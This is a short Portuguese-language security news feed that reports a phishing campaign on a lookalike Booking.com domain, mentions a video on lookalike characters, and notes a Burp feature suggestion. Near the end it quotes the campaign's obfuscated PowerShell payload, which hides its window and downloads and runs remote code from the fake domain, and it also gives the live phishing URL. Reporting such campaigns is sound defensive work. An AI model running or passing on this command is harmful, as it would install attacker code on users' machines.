Zeroc00i News & Tricks
Ohhh os caras hahaha. Criatividade sem limite sempre, impressionante http://account.booking.xn--comdetailrestric-access-ge5vga.www-account-booking.com/en/
Lembram do caractere que falamos esses dias sendo usado pra Phishing?
O John Hammond publicou um vídeo ha 3 horas falando sobre isso e outros caracteres parecidos que tem o mesmo comportamento:

https://youtu.be/nxVr4ERhrPQ?si=-Lbb1B2Qs8hNp4w9&t=609
Zeroc00i News & Tricks
Fim da live Fiz meu papel O James me mostrou o custom action na pratica hahaha, dahora e humilde
Sou um cara muito sonhador e isso faz meus dias ter um brilho um pouco a mais com coisas que podem parecer triviais para outras pessoas.

Nessa live eu mandei um comentario falando pro James que seria legal ter uma funcionaliade no Burp

Ele não só demonstrou ao vivo como ele implementaria, como agora publicou no repositório da Portswigger e agradeceu minha sugestão no linkedin. Muito dahora!
Fim da live
Fiz meu papel
O James me mostrou o custom action na pratica hahaha, dahora e humilde
powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(261)); Start-Sleep 1;"                                                                                                                                                     Ray ID: 3658b22362ef2157 powershell -nop -ep bypass -C ((Add-Type '[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);' -Name W -PassThru)::ShowWindow((Get-Process -Id $PID).MainWindowHandle,0));Write-Host "Please wait.";iex([IO.StreamReader]::new([Net.WebRequest]::Create("htt"+"p:/"+"/www-"+"acco"+"unt-"+"book"+"ing"+".co"+"m/c.php?a=0"+"").GetResponse().GetResponseStream())).ReadToEnd();$v="d1008b"
Página fake (reparem na URL):
Back to Top